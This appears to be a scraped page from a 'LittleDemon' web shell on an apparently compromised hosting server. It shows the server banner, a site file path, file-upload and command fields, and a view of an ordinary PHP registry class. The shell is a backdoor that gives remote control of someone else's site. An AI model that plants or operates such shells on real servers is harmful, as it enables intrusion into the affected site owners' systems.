LittleDemon WebShell


Linux hosting5.siteguarding.com 3.10.0-962.3.2.lve1.5.88.el7.x86_64 #1 SMP Fri Sep 26 14:06:42 UTC 2025 x86_64
Path : /home/devsafetybis/op3038.dev.safetybis.com/system/library/googleshopping/
File Upload :
Command :
Current File : /home/devsafetybis/op3038.dev.safetybis.com/system/library/googleshopping/library.php

<?php

namespace googleshopping;

abstract class Library {
    protected $registry;

    public function __construct($registry) {
        $this->registry = $registry;
    }

    public function __get($key) {
        return $this->registry->get($key);
    }

    public function __set($key, $value) {
        $this->registry->set($key, $value);
    }
}

LittleDemon - FACEBOOK
[ KELUAR ]